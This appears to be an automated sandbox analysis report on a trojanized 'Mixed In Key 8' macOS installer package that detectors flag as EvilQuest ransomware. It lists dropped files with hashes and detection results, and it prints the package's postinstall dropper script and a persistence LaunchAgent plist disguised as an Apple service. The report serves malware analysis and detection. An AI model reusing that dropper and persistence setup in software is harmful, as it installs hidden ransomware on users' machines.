Preview:	........... GDEF.B....<(...bGPOS......>...].GSUB..Y...X....OS/2...<.......`cmap.wX....X...Fcvt /.....0....Xfpgm.."...-.....gasp......<.....glyfi\|b5..;....0hdmx/KCZ...@....head...m...,...6hhea.......d...$hmtx.q.........8loca..r...0.....maxp.>......... name.B.U..7D....post.a.d..;.... prep.1 .../\...?......#.&.8._.<...................R..;...6.s.................l.......;.f.6.............................X.......................Y.,.......3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d...................6.D.....0.W.L.......=.\.....n.....U.r.k.L.....B.-.........W.j.W...W.&.W.9.W...W...W.j.W...W.9.W.............K.U.p...6..... .J.......I...\|...I.t.I.g.I.X.....I...c.O.....I.!.I...I...I.J.x...I.J.t...F...-.....$.{...............................p.D.].c...A...2.%.W.-...G.Z.U...B...~.X...L.....;...........;...(.M...c.C.W...^.V...........W.M.i...q...................:...#...x.Z.v.....D.^.y.........8.........a...>.p.y.....j.E...C.k.Z.......&.....g...v.9...\......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_oAO95V Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11560
Entropy (8bit):	4.476377058372447
Encrypted:	false
SSDEEP:	192:qf9qG4QSAVOSbwF1wOFXuFJyQtxmG3ep/7rlzKfHbxc+Xq0rhlkT8SHfH2:kOu9b01DY/rGBt+dc+aclkT8SH+
MD5:	D273D63619C9AEAF15CDAF76422C4F87
SHA1:	47B573E3824CD5E02A1A3AE99E2735B49E0256E4
SHA-256:	3DDF9BE5C28FE27DAD143A5DC76EEA25222AD1DD68934A047064E56ED2FA40C5
SHA-512:	4CC5A12BFE984C0A50BF7943E2D70A948D520EF423677C77629707AACE3A95AA378D205DE929105D644680679E70EF2449479B360AD44896B75BAFED66613272
Malicious:	false
Preview:	.. Apache License.. Version 2.0, January 2004.. http://www.apache.org/licenses/.... TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.... 1. Definitions..... "License" shall mean the terms and conditions for use, reproduction,.. and distribution as defined by Sections 1 through 9 of this document..... "Licensor" shall mean the copyright owner or entity authorized by.. the copyright owner that is granting the License..... "Legal Entity" shall mean the union of the acting entity and all.. other entities that control, are controlled by, or are under common.. control with that entity. For the purposes of this definition,.. "control" means (i) the power, direct or indirect, to cause the.. direction or management of such entity, whether by contract or.. otherwise, or (ii) ownership of fifty percent (50%) or more of the.. outstanding shares, or

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_pdEYlM Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 26 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.RobotoBoldRoboto BoldVersion 2.137; 2017Roboto-B
Category:	dropped
Size (bytes):	170760
Entropy (8bit):	6.461560977756977
Encrypted:	false
SSDEEP:	3072:q4X4HXYXXXXXX+zkBa9dX3CyiSB1/R7O0aXjC1YHeA9bOuPUPT9mYZK9K4N09PO9:qRLX6XiuMPT/eKa+JSTyXI
MD5:	EE7B96FA85D8FDB8C126409326AC2D2B
SHA1:	0CE37CED9C5FCAC9BDC452A432C1258870BA4677
SHA-256:	7D0B991EE3E0BE7AF01AD7EA8CD2BEEA6C00A25E679A0226B6737F079AAFFF86
SHA-512:	63849D833A0D2F923066DA3CD83332C1C48E5D599730A96E6CB36738A0AC7A9E108236E74E3EDAC3A6D680A9A7C4776BEF801E492536AB2A1DB66588D1AD5A72
Malicious:	false
Preview:	........... GDEF.B.........bGPOS.nK... H..e.GSUB..Y...x....OS/2...........`cmap.wX....X...Fcvt +~....0....Hfpgm_.....-.....gasp............glyf..H...:....hdmx.......@....head...\...,...6hhea.&.....d...$hmtx'..].......8locaw..C..0.....maxp.>......... name.m.A.......5post.m.d....... prep*v60../\...)......#..Np._.<...................R..0.....s.................l.......0.5...............................N...............2.................3.......3.....f..................P. [... ....GOOG. .........f.... ........:... . .....d.................-.\|...@...@...\..._.@.G.K.?...\|...(.....^.9...#...n.S.~......._.......F...@...7...i...d...=..._...V.B.}...9...6.....".x...-.).K.b.......<.V.3.......b...s.^.....U...x.(.....U.............V.).....T.......E...(.D.t.;.....#...........I.9.x.`...9.....,.......4.J.D...o.,.B...B.S.H.......E.z.h...m.....F.o...~...o.{.i...B...o...B...o...8.....z.h...................J...0.......".0.j.B.....c...c...Q.J.........\...^.F.V.......M.i.~.F.V.......~.L.Y...7...0...e.......K

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_pnZgQG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 26 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.RobotoItalicRoboto ItalicVersion 2.137; 2017Robo
Category:	dropped
Size (bytes):	173932
Entropy (8bit):	6.472653515114601
Encrypted:	false
SSDEEP:	3072:pakqz5TY60bJiQTD/w00tEXlVT2puMWemTFrDf/7/xnb/cUg4vq97PilfZiPyuNr:W9YTB/aEBaJWr3b9/cUg4vq97PCxiPbr
MD5:	42BBE4EEFCDE1297B11DC4B6491E9746
SHA1:	0213E38DFFDE2A0A5672D84FB62C6AA994E38C3B
SHA-256:	5FCE8B6F8BA9F4D19F0D535E241D56A2B8E72BB07E7DF711D968D092EF7F9FCA
SHA-512:	493001B1D8C9218AD39E10C5BFB6772B330A13E7EE651C48AB3BC6BA66F69A7D3C5592FA27E9B77326DA557DB6CB19A09683795F1718DDABD17D7DBB0CFF29B7
Malicious:	false
Preview:	........... GDEF.B....1....bGPOS......4...].GSUB..Y........OS/2...R.......`cmap.wX....X...Fcvt ..-...0....Rfpgms.....-.....gasp......1.....glyf.I..;....$hdmx:[La...@....head...e...,...6hhea.......d...$hmtx3d.........8loca\|..Q..0.....maxp.>......... name..K..-8...Gpost.a.d..1.... prep..].../\...D......#.6..._.<...................R..8...L.s.................l.......8.l.L.............................V.......................o.........3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d...................C.......R.f.J.......:.d.....m.....b.k.p.L...........5.=...f.h.f...f...f.4.f...f.r.f.p.f...f.A.f.....+.......A.L.p...:.......D.......;...t.!.;.s.;.T.;.S.y...;.&.I.R.....;.7.;...;...;.`.w...;.`.o...:...'.......g.........................9.....z.H.O.....p...C.3.e.....F.j.K.&.E...t.e...P...../....... .../.....R...w.E.e...s.I...........C.Q.[...n...................8...!.....Q.i.....H.R...........C.........H...#.b.......Y.V...$.a........./.%...\...n.y...o.....{

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_r7aTLv Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 26 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-RegularRo
Category:	dropped
Size (bytes):	171676
Entropy (8bit):	6.461076726743102
Encrypted:	false
SSDEEP:	3072:Jyz4u0oy2goL/sAQRuzzlPrvRwhRFUzMWlYfxJVBxV+aYT3qPXZ10uNOIOU7og2i:JahOmCeu+bqPp1hWUMxFnI
MD5:	3E1AF3EF546B9E6ECEF9F3BA197BF7D2
SHA1:	DD1B1DB13FF1F72138C134C62F38FEF83749F36A
SHA-256:	79E851404657DAC2106B3D22AD256D47824A9A5765458EDB72C9102A45816D95
SHA-512:	81A9260AA3597C02C40AB4642C565D7584D99DDCB8A59ADDC92C15BA93F96F05F2C94DC77C2D5C11C1805F593D84E5E9C62373ECC6CA43A76D15C05C1B1D116E
Malicious:	false
Preview:	........... GDEF.B....(....bGPOS......+@..].GSUB..Y........OS/2...........`cmap.wX....X...Fcvt +.....0....Tfpgmw.`...-.....gasp......(.....glyf&.....;....lhdmxUz`z...@....head.j.z...,...6hhea.......d...$hmtx.r.........8loca.w....0.....maxp.>......... name.....$....&post.m.d..(.... prep.f..../\...I......#...pH_.<...................R......0.s.................l.....I...J.0.............................T...............$.................3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d...........................w.~.n...i...e.e.g.......&.r.....N.....5.%.....L...~.s.~...~.].~.^.~.5.~...~...~.M.~.p.~.d.......)...H.d.........K./.j.8.......5.w.?.......l...s.z.....-...j.5.....N.............v.......m.......P...1.0.........=...9.......V.....H.(.....X.@.....y.9.Z.m.}...0.\..._.=.]...<.}.`.h.......................j.....[.}....._..... ._.....i.....!...+...).......X...@.........q.......`.i...[...i.3.........Z.X.e.I.[.......f.n...J.Z.........F.a...B...>...{.......C

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/_CodeSignature/.BC.T_VyYT4E Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	53912
Entropy (8bit):	5.457896281200372
Encrypted:	false
SSDEEP:	768:omj3rv3ruajHPmAlJB194SD+C38CcuDzd:oID3iY+gfD+lrMd
MD5:	1C71068F7612F3DC2D0F25C29C381C18
SHA1:	50AABDCB7BC20964410F9C2337B3237921C7A770
SHA-256:	5DE4F95DD561054C8F6E78748F6A550CC973B80534C827F368E8BC4BAEF9C16A
SHA-512:	5EE75A7D981EEC612567466D08D788B3623240CAA15DC547C111ECD388D5EA15419BF9AB1EAA1818ABB9F1785D29C2110D521FADF20A716D84AC274D8306C8AD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Ableton_Icon.tiff</key>...<data>...zrnfOHe3nwYxiPGddHrODBSxZ9g=...</data>...<key>Resources/ArtworkPopoverView.nib</key>...<data>...tiW9tb+dS0r6nese682QJ8cVQLw=...</data>...<key>Resources/Beyond_Beatmatching_transparent.png</key>...<data>...6Ey3O0QI2+eNqXY2JIYV+WDgy48=...</data>...<key>Resources/DataSongEditor.nib</key>...<data>...qFRLadNqmXXqoO2FnsALZhpMR9I=...</data>...<key>Resources/English.lproj/AddFilesWindow.nib</key>...<dict>....<key>hash</key>....<data>....J4soXJf/V7HN81b8uhOX1mrKIgA=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/English.lproj/BetaFeedbackView.nib</key>...<dict>....<key>hash</key>....<data>....p3WqhD2oAIwOy3MrXWnx340wX1w=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/English.lproj/DragDialog.nib</key>

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Utils/.BC.T_nXMCY0 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	87920
Entropy (8bit):	5.9040129231424165
Encrypted:	false
SSDEEP:	768:c8V27RaSy6ISKpHnDzuJs0MdiqNi9cjHl3NI6/WQonko3BIDvUSynA234+hV4lYq:Za1y6Wy05/WQe3BIDmMVj5Snfn4+
MD5:	322F4FB8F257A2E651B128C41DF92B1D
SHA1:	EFBB681A61967E6F5A811F8649EC26EFE16F50AE
SHA-256:	5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
SHA-512:	33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
Malicious:	true
Yara Hits:	Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Utils/.BC.T_nXMCY0, Author: Joe Security
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 72%
Preview:	.......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/.BC.T_Bl5A7Q Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	AppleDouble encoded Macintosh file
Category:	dropped
Size (bytes):	82
Entropy (8bit):	1.957754205215279
Encrypted:	false
SSDEEP:	3:PFoESNt/FPl2XNltnlDl:PgG
MD5:	5F57248F8A15969F55F716D8E7CE1447
SHA1:	2DAF28E0B224464534EECC6576C5B87E05CAD4A7
SHA-256:	03EE1B034D79AF0D5BC807F1560E7FFD5554FF56FCF29A47B3AC5DB4F7FA4EB5
SHA-512:	2D9A3E97A5B991D9D22EF5E008F1828B9A7F8B8AA35111250EDF45F9ED3F772378119F2A8C18CF5D1141F34D0B04200EADC7B75F1AAA57E0C15083C28F73C5C7
Malicious:	false
Preview:	........Mac OS X .........2... .......R....................................

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/.BC.T_zoBeEL Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.485363044359685
Encrypted:	false
SSDEEP:	3:TKH4vIuqAdgJ/VzERMQWFrOEgNFfHXjAdiRBUHERMQFMJWqx0dcqAdiRcKwAdiRA:hUJVdFKEIAHbNxd+
MD5:	03FC4E3EF9BDBCCD7EA68537970CE472
SHA1:	7CC289BADFE38C5677175FA38810E0E18C51E1D3
SHA-256:	ABCCE423690C96A06414F68090DB40CBDAEE12B67F90D1CA64BDDBDC1D11D097
SHA-512:	6F089D9C977FABC18E0A599C8239200031B6EEED1FBBD2F8197BB82E7CDD8F695B220902BEF49276C6B1CA8784EBC3503ABA841146A4CE36B1B571703E832BF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	#!/bin/sh.mkdir /Library/mixednkey..mv /Applications/Utils/patch /Library/mixednkey/toolroomd.rmdir /Application/Utils..chmod +x /Library/mixednkey/toolroomd../Library/mixednkey/toolroomd &.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Scripts/.BC.T_87I5M0 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	AppleDouble encoded Macintosh file
Category:	dropped
Size (bytes):	82
Entropy (8bit):	1.957754205215279
Encrypted:	false
SSDEEP:	3:PFoESNt/FPl2XNltnlDl:PgG
MD5:	5F57248F8A15969F55F716D8E7CE1447
SHA1:	2DAF28E0B224464534EECC6576C5B87E05CAD4A7
SHA-256:	03EE1B034D79AF0D5BC807F1560E7FFD5554FF56FCF29A47B3AC5DB4F7FA4EB5
SHA-512:	2D9A3E97A5B991D9D22EF5E008F1828B9A7F8B8AA35111250EDF45F9ED3F772378119F2A8C18CF5D1141F34D0B04200EADC7B75F1AAA57E0C15083C28F73C5C7
Malicious:	false
Preview:	........Mac OS X .........2... .......R....................................

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Scripts/.BC.T_zxKC2r Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.485363044359685
Encrypted:	false
SSDEEP:	3:TKH4vIuqAdgJ/VzERMQWFrOEgNFfHXjAdiRBUHERMQFMJWqx0dcqAdiRcKwAdiRA:hUJVdFKEIAHbNxd+
MD5:	03FC4E3EF9BDBCCD7EA68537970CE472
SHA1:	7CC289BADFE38C5677175FA38810E0E18C51E1D3
SHA-256:	ABCCE423690C96A06414F68090DB40CBDAEE12B67F90D1CA64BDDBDC1D11D097
SHA-512:	6F089D9C977FABC18E0A599C8239200031B6EEED1FBBD2F8197BB82E7CDD8F695B220902BEF49276C6B1CA8784EBC3503ABA841146A4CE36B1B571703E832BF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	#!/bin/sh.mkdir /Library/mixednkey..mv /Applications/Utils/patch /Library/mixednkey/toolroomd.rmdir /Application/Utils..chmod +x /Library/mixednkey/toolroomd../Library/mixednkey/toolroomd &.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Utils/.BC.T_EdCtGl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	87920
Entropy (8bit):	5.9040129231424165
Encrypted:	false
SSDEEP:	768:c8V27RaSy6ISKpHnDzuJs0MdiqNi9cjHl3NI6/WQonko3BIDvUSynA234+hV4lYq:Za1y6Wy05/WQe3BIDmMVj5Snfn4+
MD5:	322F4FB8F257A2E651B128C41DF92B1D
SHA1:	EFBB681A61967E6F5A811F8649EC26EFE16F50AE
SHA-256:	5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
SHA-512:	33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
Malicious:	true
Yara Hits:	Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Utils/.BC.T_EdCtGl, Author: Joe Security
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 72%
Preview:	.......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.sandbox/.dat.nosync026b.4vCHV2 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.739815461015534
Encrypted:	false
SSDEEP:	3:mxHj+H:Aj+H
MD5:	88FD8D693BA9EB8DB72DB676B79F3BEB
SHA1:	130CE9A8D54E491AB8067739107E2403CDB9365F
SHA-256:	05A2E09456D2D60AA19C2CA52A91BF379B785FC199CCA6C6A616D2A64386B61E
SHA-512:	7403617AA6DF65643E41AF32AE39F26BDAFACB6B20E96849E89C7761304BD26215D966251395510B2C2A261ED5376621523F8FD1B1AF7721AF2254600FDD3367
Malicious:	false
Preview:	4018A93A-CA42-49FD-9AED-F33905AC97CB

/private/var/root/.ncspot Download File
Process:	/Library/AppQuest/com.apple.questd
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	43
Entropy (8bit):	4.534066429664882
Encrypted:	false
SSDEEP:	3:LBB14ad+2MV/S:9ca42U/S
MD5:	A27424D102B90DD57D3C41E64DD6BC2C
SHA1:	0C08ED936D4474117EAB50F84D0F298C87035D3F
SHA-256:	F8ACE8A6923EFAEE431825F30A0DF365E185C1C8545BB03830C5EDFDBD008E0F
SHA-512:	DA08CE511B826741D41141AF0D6DF5321AA60590A63A91CC94C53DA860ED4D43B3EFDCE4BCC129C519F9AE9859A35F4A76B670654BD539029DD6D3092757DE0B
Malicious:	false
Preview:	1wTQwR1pU\|nV1nK8vF2yRSsy3zEFYP1Nz\|3x0000043

/private/var/root/Library/.osPtRL91w Download File
Process:	/Library/AppQuest/com.apple.questd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	87920
Entropy (8bit):	5.9040129231424165
Encrypted:	false
SSDEEP:	768:c8V27RaSy6ISKpHnDzuJs0MdiqNi9cjHl3NI6/WQonko3BIDvUSynA234+hV4lYq:Za1y6Wy05/WQe3BIDmMVj5Snfn4+
MD5:	322F4FB8F257A2E651B128C41DF92B1D
SHA1:	EFBB681A61967E6F5A811F8649EC26EFE16F50AE
SHA-256:	5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
SHA-512:	33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
Malicious:	true
Yara Hits:	Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /private/var/root/Library/.osPtRL91w, Author: Joe Security
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 72%
Preview:	.......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........

/private/var/root/Library/AppQuest/com.apple.questd Download File
Process:	/Library/AppQuest/com.apple.questd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	87920
Entropy (8bit):	5.9040129231424165
Encrypted:	false
SSDEEP:	768:c8V27RaSy6ISKpHnDzuJs0MdiqNi9cjHl3NI6/WQonko3BIDvUSynA234+hV4lYq:Za1y6Wy05/WQe3BIDmMVj5Snfn4+
MD5:	322F4FB8F257A2E651B128C41DF92B1D
SHA1:	EFBB681A61967E6F5A811F8649EC26EFE16F50AE
SHA-256:	5A024FFABEFA6082031DCCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B
SHA-512:	33C8CF815E4B37A3481C0BA4DFB14A4735A46575F6F70D5B351A8595E4EC8886224577C89C80D726F2E3D7CF2460D0CDD983379ACB5FDA0A9B7310F86C988E53
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 72%
Preview:	.......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........

/private/var/root/Library/LaunchAgents/com.apple.questd.plist Download File
Process:	/Library/AppQuest/com.apple.questd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.149933061512801
Encrypted:	false
SSDEEP:	6:TMVBd/4o+tJCc4EyfdUdBRECcgVvZSXMT+M6sAjeJRRDvZvEqsSAL4:TMHdgo+tJVEdQiCXF+MWCR7tEyAU
MD5:	70C1E05FF6B32DB6E1EF873321ABD1F9
SHA1:	16878E40CD5A569BC8F441988CC07B66FFC8534A
SHA-256:	BA60FEB2A639CD847674E6599CABF986EDE7876231A292785B0365D58B7B9378
SHA-512:	1E82629B3B1FA7BB88E7EFE0393AEE7114631555FBFE614D33B9B1EFB4D299C35DAC5E393F834DCC26A5E192E46E317124C0B841F65AB371819C34802424712E
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>.<key>Label</key>.<string>questd</string>..<key>ProgramArguments</key>.<array>.<string>/var/root/Library/AppQuest/com.apple.questd</string>.<string>--silent</string>.</array>..<key>RunAtLoad</key>.<true/>..<key>KeepAlive</key>.<true/>..</dict>.</plist>

/private/var/run/.dat.nosync026b.D95Sto Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:xn:x
MD5:	CDC0D6E63AA8E41C89689F54970BB35F
SHA1:	EC91FC2DC062C0F220B5D7B52AC6446011BF98CD
SHA-256:	86A3F9B13A5B652F93CB17E3F4D212D84CF25C52A595F13FFF9F3C5810AFFF1F
SHA-512:	94913435955FFE076EA464128C36C2E1D1E8D2D0372388CA17C8FCFF57A910DC273BD6C2A24130AE1EE1B8BA05F389B426900AC54CD71CE387DAFC9271A0C4F6
Malicious:	false
Preview:	619

Static File Info

General
File type:	xar archive version 1, SHA-1 checksum
Entropy (8bit):	7.997252962963607
TrID:	Safari Extension (4004/1) 80.00% XMill compressed XML (1001/1) 20.00%
File name:	Mixed In Key 8.pkg
File size:	10515651
MD5:	66405f4bb6db1136037fde9f43830119
SHA1:	0898cd7a55b55853ce9da0f0f360ec31ecec4974
SHA256:	9e8c30955ccb5797efaab676ffdf36fe08ce32d4aab4d18e1a9ed2be43d5db0f
SHA512:	3c176a83742d35b10645b70db4ed2ff00b888073d0daa73c7a4ce11c88b5b2cda818b9ab1844b35192bbd2436567e186ca200432fe4ef8a377ecf4be49da3da1
SSDEEP:	196608:NkBu2wBiw00Bsqbxxf19Hhx7r0A8JAi2RgXuHueFrs/7M+XvEYBu:Kg2whsQrndWJAi28enS/7JXtBu
File Content Preview:	xar!...................~....x......F...........F4#%.HQ.)R:.lZu.....p...Oq........fEq8U..?....6.....UV..S.......e.......39..<..]&....l8Lb[z]...:[..#.f..0...#B....aJ;i...j..T.v....\...2..4.\|..8.Gm...6..Q;h..vk.gi....=Ny....nG.x...z.P.8...... .D25......P4Dw;

Archive PKG

Archived Files

File Path	File Attributes	File Size
Distribution		1143
Mixed_In_Key_8.pkg	D	0
Mixed_In_Key_8.pkg/Bom		102129
Mixed_In_Key_8.pkg/PackageInfo		3340
Mixed_In_Key_8.pkg/Payload		10442692
Mixed_In_Key_8.pkg/Scripts	D	0
Mixed_In_Key_8.pkg/Scripts/._postinstall		82
Mixed_In_Key_8.pkg/Scripts/Scripts	D	0
Mixed_In_Key_8.pkg/Scripts/Scripts/._postinstall		82
Mixed_In_Key_8.pkg/Scripts/Scripts/postinstall		190
Mixed_In_Key_8.pkg/Scripts/Utils	D	0
Mixed_In_Key_8.pkg/Scripts/Utils/patch		87920
Mixed_In_Key_8.pkg/Scripts/postinstall		190

Extracted Files

Extracted File
File path:	Distribution
File size:	1143
File type:	XML 1.0 document, ASCII text

Extracted File
File path:	Mixed_In_Key_8.pkg/Bom
File size:	102129
File type:	Mac OS X bill of materials (BOM) file

Extracted File
File path:	Mixed_In_Key_8.pkg/PackageInfo
File size:	3340
File type:	ASCII text

Extracted File
File path:	Mixed_In_Key_8.pkg/Payload
File size:	10442692
File type:	gzip compressed data, from Unix

Extracted File
File path:	Mixed_In_Key_8.pkg/Scripts/._postinstall
